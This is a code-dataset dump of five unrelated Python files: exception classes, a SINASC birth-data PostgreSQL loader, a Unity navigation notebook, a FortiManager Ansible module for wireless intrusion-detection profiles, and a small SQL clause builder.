max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
cse4305-compilers/Exceptions.py | mqt0029/univ-courses | 0 | 12770751 | <reponame>mqt0029/univ-courses
# <NAME>
# mqt0029
# 1001540029
# 2019-05-13
#---------#---------#---------#---------#---------#--------#
class InternalError( Exception ) : pass
class LexicalError( Exception ) : pass
class SemanticError( Exception ) : pass
class SyntacticError( Exception ) : pass
#---------#---------#---------#---------#---------#--------#
| 1.570313 | 2 |
pegasus/dados/insertion/insert_into_all_SINASC.py | SecexSaudeTCU/PegaSUS | 0 | 12770752 | <reponame>SecexSaudeTCU/PegaSUS
###########################################################################################################################
# SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC SINASC #
###########################################################################################################################
import os
import time
from datetime import datetime
import numpy as np
import pandas as pd
import psycopg2
from transform.prepare_SINASC import DataSinascMain, DataSinascAuxiliary
###########################################################################################################################
# pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas pandas #
###########################################################################################################################
###########################################################################################################################
# AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES * AUXILIARY TABLES #
###########################################################################################################################
# Função que utiliza "pandas.to_sql" para a inserção de dados não principais no banco de dados "child_db"
def insert_into_most_SINASC_tables(path, device, child_db):
label1 = 'append'
label2 = 'ID'
# Cria uma instância da classe "DataSinascAuxiliary" do módulo "prepare_SINASC" do package "data_wrangling"
data_sinasc_auxiliary = DataSinascAuxiliary(path)
# Chama métodos da classe "DataSinascAuxiliary" do módulo "prepare_SINASC" do banco de dados SINASC
df_CNESDN = data_sinasc_auxiliary.get_CNESDN_treated()
df_CNESDN.to_sql('codestab', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TABUF = data_sinasc_auxiliary.get_TABUF_treated()
df_TABUF.to_sql('ufcod', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_RSAUDE = data_sinasc_auxiliary.get_RSAUDE_treated()
df_RSAUDE.to_sql('rsaude', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_CADMUN = data_sinasc_auxiliary.get_CADMUN_treated()
df_CADMUN.to_sql('codmunnasc', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_LOCOCOR = data_sinasc_auxiliary.get_LOCOCOR_treated()
df_LOCOCOR.to_sql('locnasc', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_SITCONJU = data_sinasc_auxiliary.get_SITCONJU_treated()
df_SITCONJU.to_sql('estcivmae', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_INSTRUC = data_sinasc_auxiliary.get_INSTRUC_treated()
df_INSTRUC.to_sql('escmae', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TABOCUP_2TCC = data_sinasc_auxiliary.get_TABOCUP_2TCC_treated()
df_TABOCUP_2TCC.to_sql('codocupmae', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_SEMANAS = data_sinasc_auxiliary.get_SEMANAS_treated()
df_SEMANAS.to_sql('gestacao', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
# Mesmo objeto pandas DataFrame da tabela "codmunnasc"
df_CADMUN.to_sql('codmunres', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_GRAVIDEZ = data_sinasc_auxiliary.get_GRAVIDEZ_treated()
df_GRAVIDEZ.to_sql('gravidez', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_PARTO = data_sinasc_auxiliary.get_PARTO_treated()
df_PARTO.to_sql('parto', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_CONSULT = data_sinasc_auxiliary.get_CONSULT_treated()
df_CONSULT.to_sql('consultas', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_RACA = data_sinasc_auxiliary.get_RACA_treated()
df_RACA.to_sql('racacor', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_CID10 = data_sinasc_auxiliary.get_CID10_treated()
df_CID10.to_sql('codanomal', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_NAT1212 = data_sinasc_auxiliary.get_NAT1212_treated()
df_NAT1212.to_sql('naturalmae', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
# Mesmo objeto pandas DataFrame da tabela "codmunnasc"
df_CADMUN.to_sql('codmunnatu', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_ESC2010 = data_sinasc_auxiliary.get_ESC2010_treated()
df_ESC2010.to_sql('escmae2010', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
# Mesmo objeto pandas DataFrame da tabela "racacor"
df_RACA.to_sql('racacormae', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TPMETODO = data_sinasc_auxiliary.get_TPMETODO_treated()
df_TPMETODO.to_sql('tpmetestim', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TPAPRESENT = data_sinasc_auxiliary.get_TPAPRESENT_treated()
df_TPAPRESENT.to_sql('tpapresent', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_STTRABPART = data_sinasc_auxiliary.get_STTRABPART_treated()
df_STTRABPART.to_sql('sttrabpart', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_STPARTO = data_sinasc_auxiliary.get_STPARTO_treated()
df_STPARTO.to_sql('stcesparto', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TPASSIST = data_sinasc_auxiliary.get_TPASSIST_treated()
df_TPASSIST.to_sql('tpnascassi', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TPFUNCRESP = data_sinasc_auxiliary.get_TPFUNCRESP_treated()
df_TPFUNCRESP.to_sql('tpfuncresp', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_ESCAGR1 = data_sinasc_auxiliary.get_ESCAGR1_treated()
df_ESCAGR1.to_sql('escmaeagr1', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_TABPAIS = data_sinasc_auxiliary.get_TABPAIS_treated()
df_TABPAIS.to_sql('codpaisres', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
df_ROBSON = data_sinasc_auxiliary.get_ROBSON_treated()
df_ROBSON.to_sql('tprobson', con=device, schema=child_db, if_exists=label1, index=False, index_label=label2)
###########################################################################################################################
# copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas copy_expert+pandas #
###########################################################################################################################
###########################################################################################################################
# MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE * MAIN TABLE #
###########################################################################################################################
# Função que utiliza "copy_expert" para a inserção de dados principais e "pandas.to_sql" para a inserção
# dos respectivos metadados no banco de dados "child_db"
def insert_into_main_table_and_arquivos(file_name, directory, date_ftp, device, child_db, connection_data):
start = time.time()
counting_rows = pd.read_sql(f'''SELECT COUNT('NOME') FROM {child_db}.arquivos''', con=device)
qtd_files_pg = counting_rows.iloc[0]['count']
print(f'A quantidade de arquivos principais de dados do {child_db} já carregada no {connection_data[0]}/PostgreSQL é {qtd_files_pg}.')
# Tratamento de dados principais do SINASC
base = file_name[0:2]
state = file_name[2:4]
year = file_name[4:8]
main_table = base.lower() + 'br'
print(f'\nIniciando a lida com o arquivo DN{state}{year}...')
# Cria uma instância da classe "DataSinascMain" do módulo "prepare_SINASC" do package "data_wrangling"
data_sinasc_main = DataSinascMain(state, year)
# Chama método da classe "DataSinascMain" do módulo "prepare_SINASC" referentes ao banco de dados sinasc
df = data_sinasc_main.get_DNXXaaaa_treated()
# Inserção das colunas UF_DN e ANO_DN no objeto pandas DataFrame "df"
df.insert(1, 'UF_' + base, [state]*df.shape[0])
df.insert(2, 'ANO_' + base, [int(year)]*df.shape[0])
# Criação de arquivo "csv" contendo os dados do arquivo principal de dados do sinasc armazenado no objeto...
# pandas DataFrame "df"
df.to_csv(base + state + year + '.csv', sep=',', header=False, index=False, escapechar=' ')
# Leitura do arquivo "csv" contendo os dados do arquivo principal de dados do sinasc
f = open(base + state + year + '.csv', 'r')
# Conecta ao banco de dados mãe "connection_data[0]" do SGBD PostgreSQL usando o módulo python "psycopg2"
conn = psycopg2.connect(dbname=connection_data[0],
host=connection_data[1],
port=connection_data[2],
user=connection_data[3],
password=connection_data[4])
# Criação de um cursor da conexão tipo "psycopg2" referenciado à variável "cursor"
cursor = conn.cursor()
try:
# Faz a inserção dos dados armazenados em "f" na tabela "main_table" do banco de dados "child_db"...
# usando o método "copy_expert" do "psycopg2"
cursor.copy_expert(f'''COPY {child_db}.{main_table} FROM STDIN WITH CSV DELIMITER AS ',';''', f)
except:
print(f'Tentando a inserção do arquivo {base}{state}{year} por método alternativo (pandas)...')
df.to_sql(main_table, con=device, schema=child_db, if_exists='append', index=False)
else:
conn.commit()
# Encerra o cursor
cursor.close()
# Encerra a conexão
conn.close()
# Encerra o file handler
f.close()
# Remoção do arquivo "csv"
os.remove(base + state + year + '.csv')
print(f'Terminou de inserir os dados do arquivo {base}{state}{year} na tabela {main_table} do banco de dados {child_db}.')
# Cria um objeto pandas DataFrame com apenas uma linha de dados, a qual contém informações sobre o...
# arquivo de dados principal carregado
file_data = pd.DataFrame(data=[[file_name, directory, date_ftp, datetime.today(), int(df.shape[0])]],
columns= ['NOME', 'DIRETORIO', 'DATA_INSERCAO_FTP', 'DATA_HORA_CARGA', 'QTD_REGISTROS'],
index=None
)
# Inserção de informações do arquivo principal de dados no banco de dados "child_db"
file_data.to_sql('arquivos', con=device, schema=child_db, if_exists='append', index=False)
print(f'Terminou de inserir os metadados do arquivo {base}{state}{year} na tabela arquivos do banco de dados {child_db}.')
end = time.time()
print(f'Demorou {round((end - start)/60, 1)} minutos para essas duas inserções no {connection_data[0]}/PostgreSQL!')
| 1.632813 | 2 |
Navigation.py | jvalderr239/DeepQNetwork | 0 | 12770753 | #!/usr/bin/env python
# coding: utf-8
# # Navigation
#
# ---
#
# You are welcome to use this coding environment to train your agent for the project. Follow the instructions below to get started!
#
# ### 1. Start the Environment
#
# Run the next code cell to install a few packages. This line will take a few minutes to run!
# In[ ]:
get_ipython().system('pip -q install ./python')
# The environment is already saved in the Workspace and can be accessed at the file path provided below. Please run the next code cell without making any changes.
# In[ ]:
from unityagents import UnityEnvironment
import numpy as np
# please do not modify the line below
env = UnityEnvironment(file_name="/data/Banana_Linux_NoVis/Banana.x86_64")
# Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
# In[ ]:
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
# ### 2. Examine the State and Action Spaces
#
# Run the code cell below to print some information about the environment.
# In[ ]:
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents in the environment
print('Number of agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Number of actions:', action_size)
# examine the state space
state = env_info.vector_observations[0]
print('States look like:', state)
state_size = len(state)
print('States have length:', state_size)
# ### 3. Take Random Actions in the Environment
#
# In the next code cell, you will learn how to use the Python API to control the agent and receive feedback from the environment.
#
# Note that **in this coding environment, you will not be able to watch the agent while it is training**, and you should set `train_mode=True` to restart the environment.
# In[ ]:
env_info = env.reset(train_mode=True)[brain_name] # reset the environment
state = env_info.vector_observations[0] # get the current state
score = 0 # initialize the score
while True:
action = np.random.randint(action_size) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Score: {}".format(score))
# When finished, you can close the environment.
# In[ ]:
env.close()
# ### 4. It's Your Turn!
#
# Now it's your turn to train your own agent to solve the environment! A few **important notes**:
# - When training the environment, set `train_mode=True`, so that the line for resetting the environment looks like the following:
# ```python
# env_info = env.reset(train_mode=True)[brain_name]
# ```
# - To structure your work, you're welcome to work directly in this Jupyter notebook, or you might like to start over with a new file! You can see the list of files in the workspace by clicking on **_Jupyter_** in the top left corner of the notebook.
# - In this coding environment, you will not be able to watch the agent while it is training. However, **_after training the agent_**, you can download the saved model weights to watch the agent on your own machine!
| 3.015625 | 3 |
intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/fortinet/fortimanager/plugins/modules/fmgr_widsprofile.py | Stienvdh/statrick | 0 | 12770754 | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fmgr_widsprofile
short_description: Configure wireless intrusion detection system (WIDS) profiles.
description:
- This module is able to configure a FortiManager device.
- Examples include all parameters and values which need to be adjusted to data sources before usage.
version_added: "2.10"
author:
- <NAME> (@chillancezen)
- <NAME> (@JieX19)
- <NAME> (@fshen01)
- <NAME> (@fgtdev-hblu)
notes:
- Running in workspace locking mode is supported in this FortiManager module, the top
level parameters workspace_locking_adom and workspace_locking_timeout help do the work.
- To create or update an object, use state present directive.
- To delete an object, use state absent directive.
- Normally, running one module can fail when a non-zero rc is returned. you can also override
the conditions to fail or succeed with parameters rc_failed and rc_succeeded
options:
bypass_validation:
description: only set to True when module schema diffs with FortiManager API structure, module continues to execute without validating parameters
required: false
type: bool
default: false
workspace_locking_adom:
description: the adom to lock for FortiManager running in workspace mode, the value can be global and others including root
required: false
type: str
workspace_locking_timeout:
description: the maximum time in seconds to wait for other user to release the workspace lock
required: false
type: int
default: 300
state:
description: the directive to create, update or delete an object
type: str
required: true
choices:
- present
- absent
rc_succeeded:
description: the rc codes list with which the conditions to succeed will be overriden
type: list
required: false
rc_failed:
description: the rc codes list with which the conditions to fail will be overriden
type: list
required: false
adom:
description: the parameter (adom) in requested url
type: str
required: true
widsprofile:
description: the top level parameters set
required: false
type: dict
suboptions:
ap-auto-suppress:
type: str
description: 'Enable/disable on-wire rogue AP auto-suppression (default = disable).'
choices:
- 'disable'
- 'enable'
ap-bgscan-disable-day:
description: no description
type: list
choices:
- sunday
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
ap-bgscan-disable-end:
type: str
description: 'End time, using a 24-hour clock in the format of hh:mm, for disabling background scanning (default = 00:00).'
ap-bgscan-disable-start:
type: str
description: 'Start time, using a 24-hour clock in the format of hh:mm, for disabling background scanning (default = 00:00).'
ap-bgscan-duration:
type: int
description: 'Listening time on a scanning channel (10 - 1000 msec, default = 20).'
ap-bgscan-idle:
type: int
description: 'Waiting time for channel inactivity before scanning this channel (0 - 1000 msec, default = 0).'
ap-bgscan-intv:
type: int
description: 'Period of time between scanning two channels (1 - 600 sec, default = 1).'
ap-bgscan-period:
type: int
description: 'Period of time between background scans (60 - 3600 sec, default = 600).'
ap-bgscan-report-intv:
type: int
description: 'Period of time between background scan reports (15 - 600 sec, default = 30).'
ap-fgscan-report-intv:
type: int
description: 'Period of time between foreground scan reports (15 - 600 sec, default = 15).'
ap-scan:
type: str
description: 'Enable/disable rogue AP detection.'
choices:
- 'disable'
- 'enable'
ap-scan-passive:
type: str
description: 'Enable/disable passive scanning. Enable means do not send probe request on any channels (default = disable).'
choices:
- 'disable'
- 'enable'
asleap-attack:
type: str
description: 'Enable/disable asleap attack detection (default = disable).'
choices:
- 'disable'
- 'enable'
assoc-flood-thresh:
type: int
description: 'The threshold value for association frame flooding.'
assoc-flood-time:
type: int
description: 'Number of seconds after which a station is considered not connected.'
assoc-frame-flood:
type: str
description: 'Enable/disable association frame flooding detection (default = disable).'
choices:
- 'disable'
- 'enable'
auth-flood-thresh:
type: int
description: 'The threshold value for authentication frame flooding.'
auth-flood-time:
type: int
description: 'Number of seconds after which a station is considered not connected.'
auth-frame-flood:
type: str
description: 'Enable/disable authentication frame flooding detection (default = disable).'
choices:
- 'disable'
- 'enable'
comment:
type: str
description: 'Comment.'
deauth-broadcast:
type: str
description: 'Enable/disable broadcasting de-authentication detection (default = disable).'
choices:
- 'disable'
- 'enable'
deauth-unknown-src-thresh:
type: int
description: 'Threshold value per second to deauth unknown src for DoS attack (0: no limit).'
eapol-fail-flood:
type: str
description: 'Enable/disable EAPOL-Failure flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-fail-intv:
type: int
description: 'The detection interval for EAPOL-Failure flooding (1 - 3600 sec).'
eapol-fail-thresh:
type: int
description: 'The threshold value for EAPOL-Failure flooding in specified interval.'
eapol-logoff-flood:
type: str
description: 'Enable/disable EAPOL-Logoff flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-logoff-intv:
type: int
description: 'The detection interval for EAPOL-Logoff flooding (1 - 3600 sec).'
eapol-logoff-thresh:
type: int
description: 'The threshold value for EAPOL-Logoff flooding in specified interval.'
eapol-pre-fail-flood:
type: str
description: 'Enable/disable premature EAPOL-Failure flooding (to STA) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-pre-fail-intv:
type: int
description: 'The detection interval for premature EAPOL-Failure flooding (1 - 3600 sec).'
eapol-pre-fail-thresh:
type: int
description: 'The threshold value for premature EAPOL-Failure flooding in specified interval.'
eapol-pre-succ-flood:
type: str
description: 'Enable/disable premature EAPOL-Success flooding (to STA) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-pre-succ-intv:
type: int
description: 'The detection interval for premature EAPOL-Success flooding (1 - 3600 sec).'
eapol-pre-succ-thresh:
type: int
description: 'The threshold value for premature EAPOL-Success flooding in specified interval.'
eapol-start-flood:
type: str
description: 'Enable/disable EAPOL-Start flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-start-intv:
type: int
description: 'The detection interval for EAPOL-Start flooding (1 - 3600 sec).'
eapol-start-thresh:
type: int
description: 'The threshold value for EAPOL-Start flooding in specified interval.'
eapol-succ-flood:
type: str
description: 'Enable/disable EAPOL-Success flooding (to AP) detection (default = disable).'
choices:
- 'disable'
- 'enable'
eapol-succ-intv:
type: int
description: 'The detection interval for EAPOL-Success flooding (1 - 3600 sec).'
eapol-succ-thresh:
type: int
description: 'The threshold value for EAPOL-Success flooding in specified interval.'
invalid-mac-oui:
type: str
description: 'Enable/disable invalid MAC OUI detection.'
choices:
- 'disable'
- 'enable'
long-duration-attack:
type: str
description: 'Enable/disable long duration attack detection based on user configured threshold (default = disable).'
choices:
- 'disable'
- 'enable'
long-duration-thresh:
type: int
description: 'Threshold value for long duration attack detection (1000 - 32767 usec, default = 8200).'
name:
type: str
description: 'WIDS profile name.'
null-ssid-probe-resp:
type: str
description: 'Enable/disable null SSID probe response detection (default = disable).'
choices:
- 'disable'
- 'enable'
sensor-mode:
type: str
description: 'Scan WiFi nearby stations (default = disable).'
choices:
- 'disable'
- 'foreign'
- 'both'
spoofed-deauth:
type: str
description: 'Enable/disable spoofed de-authentication attack detection (default = disable).'
choices:
- 'disable'
- 'enable'
weak-wep-iv:
type: str
description: 'Enable/disable weak WEP IV (Initialization Vector) detection (default = disable).'
choices:
- 'disable'
- 'enable'
wireless-bridge:
type: str
description: 'Enable/disable wireless bridge detection (default = disable).'
choices:
- 'disable'
- 'enable'
'''
EXAMPLES = '''
- hosts: fortimanager-inventory
collections:
- fortinet.fortimanager
connection: httpapi
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
- name: Configure wireless intrusion detection system (WIDS) profiles.
fmgr_widsprofile:
bypass_validation: False
workspace_locking_adom: <value in [global, custom adom including root]>
workspace_locking_timeout: 300
rc_succeeded: [0, -2, -3, ...]
rc_failed: [-2, -3, ...]
adom: <your own value>
state: <value in [present, absent]>
widsprofile:
ap-auto-suppress: <value in [disable, enable]>
ap-bgscan-disable-day:
- sunday
- monday
- tuesday
- wednesday
- thursday
- friday
- saturday
ap-bgscan-disable-end: <value of string>
ap-bgscan-disable-start: <value of string>
ap-bgscan-duration: <value of integer>
ap-bgscan-idle: <value of integer>
ap-bgscan-intv: <value of integer>
ap-bgscan-period: <value of integer>
ap-bgscan-report-intv: <value of integer>
ap-fgscan-report-intv: <value of integer>
ap-scan: <value in [disable, enable]>
ap-scan-passive: <value in [disable, enable]>
asleap-attack: <value in [disable, enable]>
assoc-flood-thresh: <value of integer>
assoc-flood-time: <value of integer>
assoc-frame-flood: <value in [disable, enable]>
auth-flood-thresh: <value of integer>
auth-flood-time: <value of integer>
auth-frame-flood: <value in [disable, enable]>
comment: <value of string>
deauth-broadcast: <value in [disable, enable]>
deauth-unknown-src-thresh: <value of integer>
eapol-fail-flood: <value in [disable, enable]>
eapol-fail-intv: <value of integer>
eapol-fail-thresh: <value of integer>
eapol-logoff-flood: <value in [disable, enable]>
eapol-logoff-intv: <value of integer>
eapol-logoff-thresh: <value of integer>
eapol-pre-fail-flood: <value in [disable, enable]>
eapol-pre-fail-intv: <value of integer>
eapol-pre-fail-thresh: <value of integer>
eapol-pre-succ-flood: <value in [disable, enable]>
eapol-pre-succ-intv: <value of integer>
eapol-pre-succ-thresh: <value of integer>
eapol-start-flood: <value in [disable, enable]>
eapol-start-intv: <value of integer>
eapol-start-thresh: <value of integer>
eapol-succ-flood: <value in [disable, enable]>
eapol-succ-intv: <value of integer>
eapol-succ-thresh: <value of integer>
invalid-mac-oui: <value in [disable, enable]>
long-duration-attack: <value in [disable, enable]>
long-duration-thresh: <value of integer>
name: <value of string>
null-ssid-probe-resp: <value in [disable, enable]>
sensor-mode: <value in [disable, foreign, both]>
spoofed-deauth: <value in [disable, enable]>
weak-wep-iv: <value in [disable, enable]>
wireless-bridge: <value in [disable, enable]>
'''
RETURN = '''
request_url:
description: The full url requested
returned: always
type: str
sample: /sys/login/user
response_code:
description: The status of api request
returned: always
type: int
sample: 0
response_message:
description: The descriptive message of the api response
type: str
returned: always
sample: OK.
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import NAPIManager
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import check_galaxy_version
from ansible_collections.fortinet.fortimanager.plugins.module_utils.napi import check_parameter_bypass
def main():
jrpc_urls = [
'/pm/config/adom/{adom}/obj/wireless-controller/wids-profile',
'/pm/config/global/obj/wireless-controller/wids-profile'
]
perobject_jrpc_urls = [
'/pm/config/adom/{adom}/obj/wireless-controller/wids-profile/{wids-profile}',
'/pm/config/global/obj/wireless-controller/wids-profile/{wids-profile}'
]
url_params = ['adom']
module_primary_key = 'name'
module_arg_spec = {
'bypass_validation': {
'type': 'bool',
'required': False,
'default': False
},
'workspace_locking_adom': {
'type': 'str',
'required': False
},
'workspace_locking_timeout': {
'type': 'int',
'required': False,
'default': 300
},
'rc_succeeded': {
'required': False,
'type': 'list'
},
'rc_failed': {
'required': False,
'type': 'list'
},
'state': {
'type': 'str',
'required': True,
'choices': [
'present',
'absent'
]
},
'adom': {
'required': True,
'type': 'str'
},
'widsprofile': {
'required': False,
'type': 'dict',
'options': {
'ap-auto-suppress': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'ap-bgscan-disable-day': {
'required': False,
'type': 'list',
'choices': [
'sunday',
'monday',
'tuesday',
'wednesday',
'thursday',
'friday',
'saturday'
]
},
'ap-bgscan-disable-end': {
'required': False,
'type': 'str'
},
'ap-bgscan-disable-start': {
'required': False,
'type': 'str'
},
'ap-bgscan-duration': {
'required': False,
'type': 'int'
},
'ap-bgscan-idle': {
'required': False,
'type': 'int'
},
'ap-bgscan-intv': {
'required': False,
'type': 'int'
},
'ap-bgscan-period': {
'required': False,
'type': 'int'
},
'ap-bgscan-report-intv': {
'required': False,
'type': 'int'
},
'ap-fgscan-report-intv': {
'required': False,
'type': 'int'
},
'ap-scan': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'ap-scan-passive': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'asleap-attack': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'assoc-flood-thresh': {
'required': False,
'type': 'int'
},
'assoc-flood-time': {
'required': False,
'type': 'int'
},
'assoc-frame-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'auth-flood-thresh': {
'required': False,
'type': 'int'
},
'auth-flood-time': {
'required': False,
'type': 'int'
},
'auth-frame-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'comment': {
'required': False,
'type': 'str'
},
'deauth-broadcast': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'deauth-unknown-src-thresh': {
'required': False,
'type': 'int'
},
'eapol-fail-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-fail-intv': {
'required': False,
'type': 'int'
},
'eapol-fail-thresh': {
'required': False,
'type': 'int'
},
'eapol-logoff-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-logoff-intv': {
'required': False,
'type': 'int'
},
'eapol-logoff-thresh': {
'required': False,
'type': 'int'
},
'eapol-pre-fail-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-pre-fail-intv': {
'required': False,
'type': 'int'
},
'eapol-pre-fail-thresh': {
'required': False,
'type': 'int'
},
'eapol-pre-succ-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-pre-succ-intv': {
'required': False,
'type': 'int'
},
'eapol-pre-succ-thresh': {
'required': False,
'type': 'int'
},
'eapol-start-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-start-intv': {
'required': False,
'type': 'int'
},
'eapol-start-thresh': {
'required': False,
'type': 'int'
},
'eapol-succ-flood': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'eapol-succ-intv': {
'required': False,
'type': 'int'
},
'eapol-succ-thresh': {
'required': False,
'type': 'int'
},
'invalid-mac-oui': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'long-duration-attack': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'long-duration-thresh': {
'required': False,
'type': 'int'
},
'name': {
'required': True,
'type': 'str'
},
'null-ssid-probe-resp': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'sensor-mode': {
'required': False,
'choices': [
'disable',
'foreign',
'both'
],
'type': 'str'
},
'spoofed-deauth': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'weak-wep-iv': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
},
'wireless-bridge': {
'required': False,
'choices': [
'disable',
'enable'
],
'type': 'str'
}
}
}
}
params_validation_blob = []
check_galaxy_version(module_arg_spec)
module = AnsibleModule(argument_spec=check_parameter_bypass(module_arg_spec, 'widsprofile'),
supports_check_mode=False)
fmgr = None
if module._socket_path:
connection = Connection(module._socket_path)
fmgr = NAPIManager(jrpc_urls, perobject_jrpc_urls, module_primary_key, url_params, module, connection, top_level_schema_name='data')
fmgr.validate_parameters(params_validation_blob)
fmgr.process_curd()
else:
module.fail_json(msg='MUST RUN IN HTTPAPI MODE')
module.exit_json(meta=module.params)
if __name__ == '__main__':
main()
| 1.375 | 1 |
curd/connections/utils/sql.py | jdxin0/curd | 8 | 12770755 | from datetime import datetime, timezone
class BaseClause(object):
def __init__(self, field, value):
self._field = field
self._value = value
@property
def field(self):
return '.'.join(
['`{}`'.format(i) for i in self._field.replace('`', '').split('.')])
@property
def value(self):
if isinstance(self._value, datetime) and self._value.tzinfo:
return self._value.astimezone(tz=timezone.utc).replace(tzinfo=None)
elif isinstance(self._value, list) or isinstance(self._value, tuple):
value = []
for v in self._value:
if isinstance(self._value, datetime) and self._value.tzinfo:
value.append(
v.astimezone(tz=timezone.utc).replace(tzinfo=None)
)
else:
value.append(v)
return value
else:
return self._value
class WhereClause(BaseClause):
def __init__(self, field, operator, value):
super().__init__(field, value)
self._operator = operator
if value is None:
if self._operator == '=':
self._operator = 'IS'
elif self._operator == '!=':
self._operator = 'IS NOT'
@property
def operator(self):
return self._operator
class FieldClause(BaseClause):
def __init__(self, field):
self._field = field
class AssignmentClause(BaseClause):
pass
class BaseSQLStatement(object):
def __init__(self):
self.query = None
self.params = []
def generate_query_field(self, table):
return table.field
def generate_query_where(self, where):
query = ''
if where:
query += 'WHERE '
segs = []
for where_clause in where:
if where_clause.operator == 'IN':
value_count = len(where_clause.value)
segs.append(
'{} {} {}'.format(
where_clause.field,
where_clause.operator,
'({})'.format(', '.join(['%s']*value_count))
)
)
for v in where_clause.value:
self.params.append(v)
else:
segs.append(
'{} {} {}'.format(
where_clause.field, where_clause.operator, '%s'
)
)
self.params.append(where_clause.value)
query += ' AND '.join(segs)
return query
def generate_query_fields(self, fields):
if fields:
return ', '.join([field_clause.field for field_clause in fields])
else:
return '*'
def generate_query_limit(self, limit):
if limit:
return 'LIMIT {}'.format(limit)
else:
return ''
